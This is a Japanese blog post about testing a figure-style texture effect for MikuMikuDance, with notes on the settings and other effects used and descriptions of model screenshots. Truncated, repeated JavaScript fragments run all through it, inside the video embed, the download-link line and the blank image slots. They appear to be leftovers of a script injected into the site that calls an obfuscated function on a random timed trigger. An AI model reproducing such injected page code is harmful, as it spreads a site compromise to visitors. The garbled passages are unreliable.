【MME】フィギュア風質感エフェクト を試してみた

紹介動画はこちら。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm18524733″]

配布場所はビームマンPのサイト

ビームマンのエフェクト置き場

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://www43.atwiki.jp/beamman/

さっそくダウンロードして試してみました。

使い方は同梱されている簡易説明書.txtを参照。

今回はおまけでついていたFigure_魔理沙低反射材質用.fxを使いました。

他のMMEは、下記を使用しています。

・SSAO

・デュエーションフィルタ

・GodRay

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

魔理沙のフィギアを見つめるアリスな感じ。

アリスのサイズを10倍にして撮影しました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

魔理沙の全体。

フィギアに見せようとすると光のあて方も大事ですね。

おもしろいエフェクトですよね。

本当にフィギアみたいです。

パラメータによって色々と調整できるようなので、さらにフィギアらしい感じに仕上げることも可能なのかもしれません。

エッジを0.3にしていましたが、0に設定して、再調整していました。

あまりかわらなかったかな?

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

コメントを残す